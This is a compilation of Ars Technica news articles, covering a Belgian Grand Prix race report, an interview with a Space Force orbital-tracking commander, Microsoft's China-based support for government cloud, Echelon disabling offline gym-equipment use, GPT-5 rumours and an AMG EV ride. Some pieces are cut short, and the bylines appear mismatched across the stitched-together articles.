Author name: DJ Henderson


F1 in Belgium: The best racetrack in the world


Changeable conditions usually make for exciting races, but 2025 was a bit dull.

Lewis Hamilton of Ferrari during the Formula 1 Belgian Grand Prix at Spa-Francorchamps in Spa, Belgium on July 27, 2025.

Does every race track have to have a Ferris wheel now? For the record, Eau Rouge is the left-hand corner those cars are approaching; the corner at the top of the hill is Raidillon. Credit: Jakub Porzycki/NurPhoto via Getty Images


Formula 1 made its annual stop at Spa-Francorchamps, the historic track that winds its way through the hills and trees of the Ardennes. I'll admit, I'd been waiting for this one; in fact, I've become something of a Spa bore, having fallen in love with the place all over again a few weeks ago while attending the CrowdStrike 24-hour GT3 race.

The 4.4-mile (7 km) track delivers, whether as a challenge to the drivers (corners like Eau Rouge, Raidillon, Pouhon, and Blanchimont are the equal of any) or as a spectacle. There's elevation change, something that neither Monza nor Silverstone nor Montreal can offer. It has history, dating back well before the start of the Formula 1 world championship in 1950, albeit in a much longer, much scarier version that was truncated by more than half in 1979. The views are spectacular from almost anywhere you choose to watch, and despite the track's size, it's a pleasant and easy walk through the forest paths (just as long as you can stop imagining that one scene from Band of Brothers).

The food and drink in the region are worth a visit by themselves, and architecture fans will enjoy the Belgians’ chaotic attitude toward planning permission and house renovations, which appears to boil down to “do whatever you like as long as it looks good and won’t fall down.” Pretty good driving roads in the area, too, although they get even better toward the Nürburgring, just over an hour away in Germany.

The other thing Spa has plenty of is weather. (Well, almost always; while it rained during practice for the 24-hour race last month, the race itself was completely dry. As was the Nürburgring 24 the weekend before. And the 24 Hours of Le Mans the week before that. Which scares me.) But there was weather aplenty for the 2025 Belgian Grand Prix.

Sprint weekend

This year Spa held a sprint weekend, significantly shortening the practice time available to teams, most of whom brought technical upgrades to the race. Sprint qualifying was shaped by track evolution, with the surface getting grippier as more and more cars attempted to set fast times. Sauber rookie Gabriel Bortoleto in particular garnered some well-deserved attention for getting into SQ3, up among the very fastest cars, as did the Haas of Oliver Bearman (and his anything-but-a-rookie teammate Nico Hülkenberg).

McLaren’s Oscar Piastri secured pole for the sprint race, lining up next to the Red Bull of Max Verstappen, whose team is now under the direction of Laurent Mekies after Red Bull’s corporate owners gave founding team principal Christian Horner his marching orders two weeks ago. As I wrote some months ago, for the past few years Red Bull’s design team has built cars that, while theoretically fast, are so difficult to drive at the limit that only Verstappen can exploit them properly. A single driver in the fastest car can win the drivers’ championship, but if you want the teams’ title (and that’s usually the one the bonuses are tied to), then you’d better have both cars scoring good points. Just ask McLaren.

And Red Bull can no longer claim to have built the fastest car, even in Verstappen’s hands.


The grid negotiates the first corner—La Source—at the start of the sprint race. Credit: Clive Rose – Formula 1/Formula 1 via Getty Images

That said, starting in second place at Spa is not so bad. After the slow hairpin of La Source (which McLaren has finally built a car able to cope with), there’s a long run to Les Combes, with the challenge of Eau Rouge and Raidillon on the way. Verstappen got a good tow in Piastri’s slipstream along the Kemmel straight toward Les Combes (isn’t it better when all the parts of the track have actual names, not just turn 1, turn 2, etc.?) and got past, staying in first place until the end, 15 laps later. Behind him, Ferrari’s Charles Leclerc did something similar to Piastri’s McLaren teammate, Lando Norris.

Although the McLaren is a faster car than either the Red Bull or the Ferrari, at Spa its speed came in the corners, and the orange cars were unable to close on or pass their rivals on the straights.

Teams and drivers faced a dilemma for Sunday’s race. They could either set their cars up for dry running, with less downforce and more top speed, or give them a higher-downforce setup to capitalize on the rain. The thing is, they have to make that decision before qualifying on Saturday, then stick with it. Setup changes are allowed, but only if you opt to start from the pitlane.

The McLarens took first and second in qualifying, with an amazing lap from Charles Leclerc pipping Verstappen to third place by just three-thousandths of a second. Alex Albon got his Williams into a fine fifth place, and Red Bull’s other driver, Yuki Tsunoda (who has a much better relationship with Mekies than he ever did with Horner), made it into seventh, just 0.3 seconds behind his otherworldly teammate. Bortoleto repeated his feat, snatching 10th in qualifying.

Not everyone had a good quali, particularly not Ferrari’s Lewis Hamilton, who was eliminated in the first session for the second time in two days, something the seven-time World Champion described as unacceptable. Mercedes’ young phenom, Kimi Antonelli, who replaced Hamilton at the team, was also eliminated in the first batch, part of a miserable weekend for the Italian, who just graduated from high school.

Race day

Sunday morning brought plenty of rain, affecting the support races and then delaying the start of the Grand Prix. Formula 1 has both intermediate and wet grooved tires, which pump gallons of water into the air from the track at speed, creating huge clouds of visibility-obscuring spray that, at a place like Spa, just hang between the trees. It’s this lack of visibility, rather than the wet track itself, that makes F1 so cautious, and so the formation lap was held behind the safety car, at which point the race officials decided to red-flag things and wait for another band of rain to pass through.

Aston Martin F1 Safety Car, Lando Norris and Oscar Piastri of McLaren during the Formula 1 Belgian Grand Prix at Spa-Francorchamps in Spa, Belgium on July 27, 2025.

The FIA was far too cautious in bringing in the safety car and getting the race started. Credit: Jakub Porzycki/NurPhoto via Getty Images

The race eventually began 90 minutes late and circulated behind the safety car for far longer than was necessary, given the emergence of a dry line before too long. The red flag gave plenty of drivers and teams the opportunity to tweak their setups for the rain—something that turned out to be the wrong move given the FIA’s reluctance to throw the green flag.

Piastri, in second place behind Norris, did to his teammate what Verstappen had done to him the day before and snatched the lead well before Les Combes, staying just far enough ahead of his closest championship rival throughout the race. A small mistake by Norris and a slightly slower pit stop from his team meant he never got close enough to challenge Piastri for the lead. Behind them, Verstappen was similarly unable to make his way past Leclerc.

Star of the race for me, and for the viewers who voted him driver of the day, was Hamilton. Starting from the pitlane at the very back of the field in a Ferrari set up for wet weather, Hamilton once again showed the skills that have won him more F1 races than any other driver in history. Have you ever seen someone overtake at Stavelot? I might have, but only in Gran Turismo 7.

A key to Hamilton’s success was pitting for slick tires at the right time—lap 11, just ahead of almost everyone else—and the British driver finished in seventh place at the end, behind the low-downforce Williams of Albon.

The 2025 race will not rank high in the pantheon of Belgian Grands Prix in terms of a thrilling race, but if you’re a motorsport fan, you owe it to yourself to make it out there sometime. Did I mention the World Endurance Championship has a six-hour race there in May? The tickets are far cheaper than F1, and you get a lot more access, too.


Jonathan is the Automotive Editor at Ars Technica. He has a BSc and PhD in Pharmacology. In 2014 he decided to indulge his lifelong passion for the car by leaving the National Human Genome Research Institute and launching Ars Technica’s automotive coverage. He lives in Washington, DC.



Ars spoke with the military’s chief orbital traffic cop—here’s what we learned


“We have some 2,000 or 2,200 objects that I call the ‘red order of battle.'”

Col. Raj Agrawal participates in a change of command ceremony to mark his departure from Mission Delta 2 at Peterson Space Force Base, Colorado. Col. Barry Croker became the new commander of Mission Delta 2 on July 3.

For two years, Col. Raj Agrawal commanded the US military unit responsible for tracking nearly 50,000 human-made objects whipping through space. In this role, he was keeper of the orbital catalog and led teams tasked with discerning whether other countries’ satellites, mainly those of China and Russia, are peaceful or present a military threat to US forces.

This job is becoming more important as the Space Force prepares for the possibility of orbital warfare.

Ars visited with Agrawal in the final weeks of his two-year tour of duty as commander of Mission Delta 2, a military unit at Peterson Space Force Base, Colorado. Mission Delta 2 collects and fuses data from a network of sensors “to identify, characterize, and exploit opportunities and mitigate vulnerabilities” in orbit, according to a Space Force fact sheet.

This involves operating radars and telescopes, analyzing intelligence information, and “mapping the geocentric space terrain” to “deliver a combat-ready common operational picture” to military commanders. Agrawal’s job has long existed in one form or another, but the job description is different today. Instead of just keeping up with where things are in space—a job challenging enough—military officials now wrestle with distinguishing which objects might have a nefarious purpose.

From teacher to commander

Agrawal’s time at Mission Delta 2 ended on July 3. His next assignment will be as Space Force chair at the National Defense University. This marks a return to education for Agrawal, who served as a Texas schoolteacher for eight years before receiving his commission as an Air Force officer in 2001.

“Teaching is, I think, at the heart of everything I do,” Agrawal said. 

He taught music and math at Trimble Technical High School, an inner-city vocational school in Fort Worth. “Most of my students were in broken homes and unfortunate circumstances,” Agrawal said. “I went to church with those kids and those families, and a lot of times, I was the one bringing them home and taking them to school. What was [satisfying] about that was a lot of those students ended up living very fulfilling lives.”

Agrawal felt a calling for higher service and signed up to join the Air Force. Given his background in music, he initially auditioned for and was accepted into the Air Force Band. But someone urged him to apply for Officer Candidate School, and Agrawal got in. “I ended up on a very different path.”

Agrawal was initially accepted into the ICBM career field, but that changed after the September 11 attacks. “That was a time when anyone with a name like mine had a hard time,” he said. “It took a little bit of time to get my security clearance.”

Instead, the Air Force assigned him to work in space operations. Agrawal quickly became an instructor in space situational awareness, did a tour at the National Reconnaissance Office, then found himself working at the Pentagon in 2019 as the Defense Department prepared to set up the Space Force as a new military service. Agrawal was tasked with leading a team of 100 people to draft the first Space Force budget.

Then, he received the call to report to Peterson Space Force Base to take command of what is now Mission Delta 2, the inheritor of decades of Air Force experience cataloging everything in orbit down to the size of a softball. The catalog was stable and predictable, lingering below 10,000 trackable objects until 2007. That’s when China tested an anti-satellite missile, shattering an old Chinese spacecraft into more than 3,500 pieces large enough to be routinely detected by the US military’s Space Surveillance Network.

This graph from the European Space Agency shows the growing number of trackable objects in orbit. Credit: European Space Agency

Two years later, an Iridium communications satellite collided with a defunct Russian spacecraft, adding thousands more debris fragments to low-Earth orbit. A rapid uptick in the pace of launches since then has added to the problem, further congesting busy orbital traffic lanes a hundred miles above the Earth. Today, the orbital catalog numbers roughly 48,000 objects.

“This compiled data, known as the space catalog, is distributed across the military, intelligence community, commercial space entities, and to the public, free of charge,” officials wrote in a fact sheet describing Mission Delta 2’s role at Space Operations Command. Deltas are Space Force military units roughly equivalent to a wing or group command in the Air Force.

The room where it happens

The good news is that the US military is getting better at tracking things in space. A network of modern radars and telescopes on the ground and in space can now spot objects as small as a golf ball. Space is big, but these objects routinely pass close to one another. At closing speeds of nearly 5 miles per second, any impact would be catastrophic.
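As a rough sanity check on that speed figure, the velocity of a circular orbit follows from v = √(GM/r). This short Python sketch works it out for a typical low-Earth-orbit altitude (the 550 km value is an illustrative choice, not one from the article):

```python
import math

GM_EARTH = 3.986004418e14  # Earth's gravitational parameter, m^3/s^2
R_EARTH = 6.371e6          # Earth's mean radius, m

def circular_orbital_speed(altitude_m: float) -> float:
    """Speed of a circular orbit at a given altitude above Earth's surface."""
    return math.sqrt(GM_EARTH / (R_EARTH + altitude_m))

v = circular_orbital_speed(550e3)  # a typical LEO altitude of 550 km
print(f"{v:,.0f} m/s ({v / 1609.344:.1f} miles/s)")
```

That comes out to roughly 7,600 m/s, or about 4.7 miles per second, consistent with the "nearly 5 miles per second" quoted above.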

But there’s a new problem. Today, the US military must not only screen for accidental collisions but also guard against an attack on US satellites in orbit. Space is militarized, a fact illustrated by growing fleets of satellites—primarily American, Chinese, and Russian—capable of approaching another country’s assets in orbit and, in some cases, disabling or destroying them. This has raised fears at the Pentagon that an adversary could take out US satellites critical for missile warning, navigation, and communications, with severe consequences for military operations and daily civilian life.

This new reality compelled the creation of the Space Force in 2019, beginning a yearslong process of migrating existing Air Force units into the new service. Now, the Pentagon is posturing for orbital warfare by investing in new technologies and reorganizing the military’s command structure.

Today, the Space Force is responsible for predicting when objects in orbit will come close to one another. This is called a conjunction in the parlance of orbital mechanics. The US military routinely issues conjunction warnings to commercial and foreign satellite operators to give them an opportunity to move their satellites out of harm’s way. These notices also go to NASA if there’s a chance of a close call with the International Space Station (ISS).
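At its simplest, a conjunction screen boils down to propagating two objects' predicted positions and checking whether their separation ever drops below a screening threshold. This toy sketch shows only that basic idea; the threshold and the sample tracks are invented for illustration, and operational screening uses covariance and probability-of-collision calculations rather than a fixed radius:

```python
import math

THRESHOLD_KM = 5.0  # illustrative screening radius; real screening volumes vary by orbit

def min_separation_km(track_a, track_b):
    """Smallest separation between two position tracks, given as lists of
    (x, y, z) points in km sampled at the same epochs."""
    return min(math.dist(a, b) for a, b in zip(track_a, track_b))

# Toy example: object B crosses object A's path over five time steps.
track_a = [(7000.0, 0.0, 0.0)] * 5
track_b = [(7000.0, 20.0 - 10.0 * i, 0.2) for i in range(5)]

d = min_separation_km(track_a, track_b)
print(f"min separation: {d:.1f} km -> {'issue warning' if d < THRESHOLD_KM else 'clear'}")
```

Here the tracks come within 0.2 km at the third time step, so this sketch would flag a conjunction and trigger a warning.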

The first Trump administration approved a new policy to transfer responsibility for these collision warnings to the Department of Commerce, allowing the military to focus on national security objectives.

But the White House’s budget request for next year would cancel the Commerce Department’s initiative to take over collision warnings. Our discussion with Agrawal occurred before the details of the White House budget were made public last month, and his comments reflect official Space Force policy at the time of the interview. “In uniform, we align to policy,” Agrawal wrote on his LinkedIn account. “We inform policy decisions, but once they’re made, we align our support accordingly.”

US Space Force officials show the 18th Space Defense Squadron’s operations floor to officials from the German Space Situational Awareness Centre during an “Operator Exchange” event at Vandenberg Space Force Base, California, on April 7, 2022. Credit: US Space Force/Tech. Sgt. Luke Kitterman

Since our interview, analysts have also noticed an uptick in interesting Russian activity in space and tracked a suspected Chinese satellite refueling mission in geosynchronous orbit.

Let’s rewind the tape to 2007, the time of China’s game-changing anti-satellite test. Gen. Chance Saltzman, today the Space Force’s Chief of Space Operations, was a lieutenant colonel in command of the Air Force’s 614th Space Operations Squadron at the time. He was on duty when Air Force operators first realized China had tested an anti-satellite missile. Saltzman has called the moment a “pivot point” in space operations. “For those of us that are neck-deep in the business, we did have to think differently from that day on,” Saltzman said in 2023.

Agrawal was in the room, too. “I was on the crew that needed to count the pieces,” he told Ars. “I didn’t know the significance of what was happening until after many years, but the Chinese had clearly changed the nature of the space environment.”

The 2007 anti-satellite test also clearly changed the trajectory of Agrawal’s career. We present part of our discussion with Agrawal below, and we’ll share the rest of the conversation tomorrow. The text has been lightly edited for brevity and clarity.

Ars: The Space Force’s role in monitoring activities in space has changed a lot in the last few years. Can you tell me about these changes, and what’s the difference between what you used to call Space Situational Awareness, and what is now called Space Domain Awareness?

Agrawal: We just finished our fifth year as a Space Force, so as a result of standing up a military service focused on space, we shifted our activities to focus on what the joint force requires for combat space power. We’ve been doing space operations for going on seven decades. I think a lot of folks think that it was a rebranding, as opposed to a different focus for space operations, and it couldn’t be further from the truth. Compared to Space Domain Awareness (SDA), Space Situational Awareness (SSA) is kind of the knowledge we produce with all these sensors, and anybody can do space situational awareness. You have academia doing that. You’ve got commercial, international partners, and so on. But Space Domain Awareness—Gen. [John “Jay”] Raymond coined the term a couple years before we stood up the Space Force—he was trying to get after, how do we create a domain focused on operational outcomes? That’s all we could say at the time. We couldn’t say war-fighting domain at the time because of where our policy was, but our policy shifted to being able to talk about space as a place where, not that we want to wage war, but that we can achieve objectives, and do that with military objectives in mind.

We used to talk about detect, characterize, attribute, predict. And then Gen. [Chance] Saltzman added target onto the construct for Space Domain Awareness, so that we’re very much in the conversation of what it means to do a space-enabled attack and being able to achieve objectives in, from, and to space, and using Space Domain Awareness as a vehicle to do those things. So, with Mission Delta 2, what he did is he took the sustainment part of acquisition, software development, cyber defense, intelligence related to Space Domain Awareness, and then all the things that we were doing in Space Domain Awareness already, put all that together under one command … and called us Mission Delta 2. So, the 18th Space Defense Squadron … that used to kind of be the center of the world for Space Domain Awareness, maybe the only unit that you could say was really doing SDA, where everyone else was kind of doing SSA. When I came into command a couple years ago, and we face now a real threat to having space superiority in the space domain, I disaggregated what we were doing just in the 18th and spread out through a couple of other units … So, that way everyone’s got kind of majors and minors, but we can quickly move a mission in case we get tested in terms of cyber defense or other kinds of vulnerabilities.

This multi-exposure image depicts a satellite-filled sky over Alberta. Credit: Alan Dyer/VWPics/Universal Images Group via Getty Images

We can’t see the space domain, so it’s not like the air domain and sea domain and land domain, where you can kind of see where everything is, and you might have radars, but ultimately it’s a human that’s verifying whether or not a target or a threat is where it is. For the space domain, we’re doing all that through radars, telescopes, and computers, so the reality we create for everyone is essentially their reality. So, if there’s a gap, if there’s a delay, if there are some signs that we can’t see, that reality is what is created by us, and that is effectively the reality for everyone else, even if there is some other version of reality in space. So, we’re getting better and better at fielding capability to see the complexity, the number of objects, and then translating that into what’s useful for us—because we don’t need to see everything all the time—but what’s useful for us for military operations to achieve military objectives, and so we’ve shifted our focus just to that.

We’re trying to get to where commercial spaceflight safety is managed by the Office of Space Commerce, so they’re training side by side with us to kind of offload that mission and take that on. We’re doing up to a million notifications a day for conjunction assessments, sometimes as low as 600,000. But last year, we did 263 million conjunction notifications. So, we want to get to where the authorities are rightly aligned, where civil or commercial notifications are done by an organization that’s not focused on joint war-fighting, and we focus on the things that we want to focus on.

Ars: Thank you for that overview. It helps me see the canvas for everything else we’re going to talk about. So, today, you’re not only tracking new satellites coming over the horizon from a recent launch or watching out for possible collisions, you’re now trying to see where things are going in space and maybe even try to determine intent, right?

Agrawal: Yeah, so the integrated mission delta has helped us have intel analysts and professionals as part of our formation. Their mission is SDA as much as ours is, but they’re using an intel lens. They’re looking at predictive intelligence, right? I don’t want to give away tradecraft, but what they’re focused on is not necessarily where a thing is. It used to be that all we cared about was position and vector, right? As long as you knew an object’s position and the direction they were going, you knew their orbit. You had predictive understanding of what their element set would be, and you only had to do sampling to get a sense of … Is it kind of where we thought it was going to be? … If it was far enough off of its element set, then we would put more energy, more sampling of that particular object, and then effectively re-catalog it.

Now, it’s a different model. We’re looking at state vectors, and we’re looking at anticipatory modeling, where we have some 2,000 or 2,200 objects that I call the “red order of battle”—that are high-interest objects that we anticipate will do things that are not predicted, that are not element set in nature, but that will follow some type of national interest. So, our intel apparatus gets after what things could potentially be a risk, and what things to continue to understand better, and what things we have to be ready to hold at risk. All of that’s happening through all the organizations, certainly within this delta, but in partnership and in support of other capabilities and deltas that are getting after their parts of space superiority.

Hostile or friendly?

Ars: Can you give some examples of these red order of battle objects?

Agrawal: I think you know about Shijian-20 (a “tech demo” satellite that has evaded inspection by US satellites) and Shiyan-24C (which the Space Force says demonstrated “dogfighting” in space), things that are advertised as scientific in nature, but clearly demonstrate capability that is not friendly, and certainly are behaving in ways that are unprofessional. In any other domain, we would consider them hostile, but in space, we try to be a lot more nuanced in terms of how we characterize behavior, but still, when something’s behaving in a way that isn’t pre-planned, isn’t pre-coordinated, and potentially causes hazard, harm, or contest with friendly forces, we now get in a situation where we have to talk about is that behavior hostile or not? Is that escalatory or not? Space Command is charged with those authorities, so they work through the legal apparatus in terms of what the definition of a hostile act is and when something behaves in a way that we consider to be of national security interest.

We present all the capability to be able to do all that, and we have to be as cognizant on the service side as the combatant commanders are, so that our intel analysts are informing the forces and the training resources to be able to anticipate the behavior. We’re not simply recognizing it when it happens, but studying nations in the way they behave in all the other domains, in the way that they set policy, in the way that they challenge norms in other international arenas like the UN and various treaties, and so on. The biggest predictor, for us, of hazardous behaviors is when nations don’t coordinate with the international community on activities that are going to occur—launches, maneuvers, and fielding of large constellations, megaconstellations.


There are nearly 8,000 Starlink satellites in orbit today. SpaceX adds dozens of satellites to the constellation each week. Credit: SpaceX

As you know, we work very closely with Starlink, and they’re very, very responsible. They coordinate and flight plan. They use the kind of things that other constellations are starting to use … changes in those elsets (element sets), for lack of a better term, state vectors, we’re on top of that. We’re pre-coordinating that. We’re doing that weeks or months in advance. We’re doing that in real-time in cooperation with these organizations to make sure that space remains safe, secure, accessible, profitable even, for industry. When you have nations, where they’re launching over their population, where they’re creating uncertainty for the rest of the world, there’s nothing else we can do with it other than treat that as potentially hostile behavior. So, it does take a lot more of our resources, a lot more of our interest, and it puts [us] in a situation where we’re posturing the whole joint force to have to deal with that kind of uncertainty, as opposed to cooperative launches with international partners, with allies, with commercial, civil, and academia, where we’re doing that as friends, and we’re doing that in cooperation. If something goes wrong, we’re handling that as friends, and we’re not having to involve the rest of the security apparatus to get after that problem.

Ars: You mentioned that SpaceX shares Starlink orbit information with your team. Is it the same story with Amazon for the Kuiper constellation?

Agrawal: Yeah, it is. The good thing is that all the US and allied commercial entities, so far, have been super cooperative with Mission Delta 2 in particular, to be able to plan out, to talk about challenges, to even change the way they do business, learning more about what we are asking of them in order to be safe. The Office of Space Commerce, obviously, is now in that conversation as well. They’re learning that trade and ideally taking on more of that responsibility. Certainly, the evolution of technology has helped quite a bit, where you have launches that are self-monitored, that are able to maintain their own safety, as opposed to requiring an entire apparatus of what was the US Air Force often having to expend a tremendous amount of resources to provide for the safety of any launch. Now, technology has gotten to a point where a lot of that is self-monitored, self-reported, and you’ll see commercial entities blow up their own rockets no matter what’s onboard if they see that it’s going to cause harm to a population, and so on. So, yeah, we’re getting a lot of cooperation from other nations, allies, partners, close friends that are also sharing and cooperating in the interest of making sure that space remains sustainable and secure.

“We’ve made ourselves responsible”

Ars: One of the great ironies is that after you figure out the positions and tracks of Chinese or Russian satellites or constellations, you’re giving that data right back to them in the form of conjunction and collision notices, right?

Agrawal: We’ve made ourselves responsible. I don’t know that there’s any organization holding us accountable to that. We believe it’s in our interests, in the US’s interests, to provide for a safe, accessible, secure space domain. So, whatever we can do to help other nations also be safe, we’re doing it certainly for their sake, but we’re doing it as much for our sake, too. We want the space domain to be safe and predictable. We do have an apparatus set up in partnership with the State Department, and with a tremendous amount of oversight from the State Department, and through US Space Command to provide for spaceflight safety notifications to China and Russia. We send notes directly to offices within those nations. Most of the time they don’t respond. Russia, I don’t recall, hasn’t responded at all in the past couple of years. China has responded a couple of times to those notifications. And we hope that, through small measures like that, we can demonstrate our commitment to getting to a predictable and safe space environment.

A model of a Chinese satellite refueling spacecraft on display during the 13th China International Aviation and Aerospace Exhibition on October 1, 2021, in Zhuhai, Guangdong Province of China. Credit: Photo by VCG/VCG via Getty Images

Ars: What does China say in response to these notices?

Agrawal: Most of the time it’s “copy” or “acknowledged.” I can only recall two instances where they’ve responded. But we did see some hope earlier this year and last year, where they wanted to open up technical exchanges with us and some of their [experts] to talk about spaceflight safety, and what measures they could take to open up those kinds of conversations, and what they could do to get a more secure, safer pace of operations. That, at some point, got delayed because of the holiday that they were going through, and then those conversations just halted, or at least progress on getting those conversations going halted. But we hope that there’ll be an opportunity again in the future where they will open up those doors again and have those kinds of conversations because, again, transparency will get us to a place where we can be predictable, and we can all benefit from orbital regimes, as opposed to using them exploitively. LEO is just one of those places where you’re not going to hide activity there, so you just are creating risk, uncertainty, and potential escalation by launching into LEO and not communicating throughout that whole process.

Ars:  Do you have any numbers on how many of these conjunction notices go to China and Russia? I’m just trying to get an idea of what proportion go to potential adversaries.

Agrawal: A lot. I don’t know the degree of how many thousands go to them, but on a regular basis, I’m dealing with debris notifications from Russian and Chinese ASAT (anti-satellite) testing. That has put the ISS at risk a number of times. We’ve had maneuvers occur in recent history as a result of Chinese rocket body debris. Debris can’t maneuver, and unfortunately, we’ve gotten into situations with particularly those two nations that talk about wanting to have safer operations, but continue to conduct debris-causing tests. We’re going to be dealing with that for generations, and we are going to have to design capability to maneuver around those debris clouds as just a function of operating in space. So, we’ve got to get to a point where we’re not doing that kind of testing in orbit.

Ars: Would it be accurate to say you send these notices to China and Russia daily?

Agrawal: Yeah, absolutely. That’s accurate. These debris clouds are in LEO, so as you can imagine, as those debris clouds go around the Earth every 90 minutes, we’re dealing with conjunctions. There are some parts of orbits that are just unusable as a result of that unsafe ASAT test.
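That 90-minute figure follows directly from orbital mechanics. As a rough illustration (my numbers, not Agrawal’s), the period of a circular low-Earth orbit can be computed from the orbit’s radius and Earth’s gravitational parameter:

```python
import math

# Illustrative sketch: why LEO debris comes back around every ~90 minutes.
# Circular-orbit period T = 2*pi*sqrt(a^3 / mu), where a is the orbital
# radius and mu is Earth's standard gravitational parameter.
MU_EARTH = 3.986004418e14   # m^3/s^2
R_EARTH = 6_371_000.0       # m, mean Earth radius

def orbital_period_minutes(altitude_m: float) -> float:
    """Period of a circular orbit at the given altitude above Earth's surface."""
    a = R_EARTH + altitude_m
    return 2 * math.pi * math.sqrt(a**3 / MU_EARTH) / 60

# A typical LEO altitude of ~400 km (ISS-like) gives roughly a 92-minute period.
print(round(orbital_period_minutes(400_000), 1))
```

Any debris cloud at a similar altitude laps the planet on roughly that schedule, which is why conjunction screening against it never stops.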


Stephen Clark is a space reporter at Ars Technica, covering private space companies and the world’s space agencies. Stephen writes about the nexus of technology, science, policy, and business on and off the planet.

Ars spoke with the military’s chief orbital traffic cop—here’s what we learned Read More »

microsoft-to-stop-using-china-based-teams-to-support-department-of-defense

Microsoft to stop using China-based teams to support Department of Defense

Last week, Microsoft announced that it would no longer use China-based engineering teams to support the Defense Department’s cloud computing systems, following ProPublica’s investigation of the practice, which cybersecurity experts said could expose the government to hacking and espionage.

But it turns out the Pentagon was not the only part of the government facing such a threat. For years, Microsoft has also used its global workforce, including China-based personnel, to maintain the cloud systems of other federal departments, including parts of Justice, Treasury and Commerce, ProPublica has found.

This work has taken place in what’s known as the Government Community Cloud, which is intended for information that is not classified but is nonetheless sensitive. The Federal Risk and Authorization Management Program, the US government’s cloud accreditation organization, has approved GCC to handle “moderate” impact information “where the loss of confidentiality, integrity, and availability would result in serious adverse effect on an agency’s operations, assets, or individuals.”

The Justice Department’s Antitrust Division has used GCC to support its criminal and civil investigation and litigation functions, according to a 2022 report. Parts of the Environmental Protection Agency and the Department of Education have also used GCC.

Microsoft says its foreign engineers working in GCC have been overseen by US-based personnel known as “digital escorts,” similar to the system it had in place at the Defense Department.

Nevertheless, cybersecurity experts told ProPublica that foreign support for GCC presents an opportunity for spying and sabotage. “There’s a misconception that, if government data isn’t classified, no harm can come of its distribution,” said Rex Booth, a former federal cybersecurity official who now is chief information security officer of the tech company SailPoint.

“With so much data stored in cloud services—and the power of AI to analyze it quickly—even unclassified data can reveal insights that could harm US interests,” he said.

Microsoft to stop using China-based teams to support Department of Defense Read More »

echelon-kills-smart-home-gym-equipment-offline-capabilities-with-update

Echelon kills smart home gym equipment offline capabilities with update

Some might never have purchased Echelon equipment if they knew the machines might one day fail to work without a web connection or Echelon account.

Third-party app connections severed

For some owners of Echelon equipment, QZ, which is currently rated as the No. 9 sports app on Apple’s App Store, has been central to their workouts. QZ connects the equipment to platforms like Zwift, which shows people virtual, scenic worlds while they’re exercising. It has also enabled new features for some machines, like automatic resistance adjustments. Because of this, Viola argued in his blog that QZ has “helped companies grow.”

“A large reason I got the [E]chelon was because of your app and I have put thousands of miles on the bike since 2021,” a Reddit user told the developer on the social media platform on Wednesday.

However, Echelon’s firmware update likely seeks to regain some of the revenue opportunities that overlap with the capabilities that apps like QZ enable. Echelon’s subscription-based app, which starts at $40 per month, also offers “guided scenic rides,” for example. QZ can allow people to watch Peloton classes from their Echelon device, but Echelon sells its own fitness classes. The Tennessee-headquartered company has been investing in ways to get customers more engaged with its personalized workout platform, too, which requires the machines to be online.

There’s also value in customer data. Getting more customers to exercise with its app means Echelon may gather more data for things like feature development and marketing.

Echelon is a private company, so we don’t know how much money it makes, but its financial goals likely hinge on subscription sales, which can generate more recurring revenue than one-time equipment purchases. Meanwhile, Echelon competes with other tech-centric companies offering gym equipment and classes, like Peloton.

Viola runs QZ, which costs $7 to $8 to download, by himself, offering users a lot of support via online communities. He told Ars that revenue from app purchases covers his costs “more or less.”

“It was never my intention to damage anyone’s business. This is just competition. The best product should prevail,” Viola said. “I never created QZ to get rich; I just wanted users to have a great hour of fitness when they choose, without connection issues, subscriptions, or [other limitations].”

On the QZ side, the user community is “working on a fully open-source Echelon controller to unlock bikes that have already received this update,” per Viola. It’s in the very early stages, he said.

Echelon kills smart home gym equipment offline capabilities with update Read More »

openai’s-most-capable-ai-model,-gpt-5,-may-be-coming-in-august

OpenAI’s most capable AI model, GPT-5, may be coming in August

References to “gpt-5-reasoning-alpha-2025-07-13” have already been spotted on X, with code showing “reasoning_effort: high” in the model configuration. These sightings suggest the model has entered final testing phases, with testers getting their hands on the code and security experts doing red teaming on the model to test vulnerabilities.

Unifying OpenAI’s model lineup

The new model represents OpenAI’s attempt to simplify its increasingly complex product lineup. As Altman explained in February, GPT-5 may integrate features from both the company’s conventional GPT models and its reasoning-focused o-series models into a single system.

“We’re truly excited to not just make a net new great frontier model, we’re also going to unify our two series,” OpenAI’s Head of Developer Experience Romain Huet said at a recent event. “The breakthrough of reasoning in the O-series and the breakthroughs in multi-modality in the GPT-series will be unified, and that will be GPT-5.”

According to The Information, GPT-5 is expected to be better at coding and more powerful overall, combining attributes of both traditional models and simulated reasoning (SR) models such as o3.

Before GPT-5 arrives, OpenAI still plans to release its first open-weights model since GPT-2 in 2019, which means others with the proper hardware will be able to download and run the AI model on their own machines. The Verge describes this model as “similar to o3 mini” with reasoning capabilities. However, Altman announced on July 11 that the open model needs additional safety testing, saying, “We are not yet sure how long it will take us.”

OpenAI’s most capable AI model, GPT-5, may be coming in August Read More »

mercedes-amg-gives-us-a-ride-in-its-next-high-performance-ev

Mercedes-AMG gives us a ride in its next high-performance EV

The first thing I noticed was the simulated engine noise. It was developed to be unique to AMG.EA, taking inspiration from some of the great AMGs of the past. AMG boss Michael Schiebe tells us that they set up shop outside the offices and had people drive by in various cars to find the right engine and exhaust notes to fit into the creation. It’s a deep, throaty sound.

It’s a sound you can feel

Seriously, I feel something in my seat. The engineer later asks if I noticed anything there, and while I can’t confirm what was adding to the sound (a speaker or a motor), it does help make the car feel more alive.

The artificial gearshifts are more than just halting power for a brief period; they’re part of a mapped-out torque curve. Like in the Hyundai, you can feel the acceleration build like you would in a combustion engine. It’s not as prominent as in the Hyundai, but it’s there.

When the car shifts, it feels a lot like a ZF 8-speed automatic in a modern performance car. It’s smooth, but enthusiastic. It’s not as extreme as the Hyundai, but I’d argue the Hyundai driver and the AMG driver are looking for a different experience, with the AMG being a bit more adult.

The AMG also, at least as it sits now, will automatically upshift at redline. The fun thing about the Hyundai is, if you intentionally miss a shift, the car will throw your head into the steering wheel as you hit the artificial rev limiter. It’s hilarious. The vibe from the prototype I’m in is that things are a bit more serious.

Mercedes-AMG gives us a ride in its next high-performance EV Read More »

fcc-to-eliminate-gigabit-speed-goal-and-scrap-analysis-of-broadband-prices

FCC to eliminate gigabit speed goal and scrap analysis of broadband prices

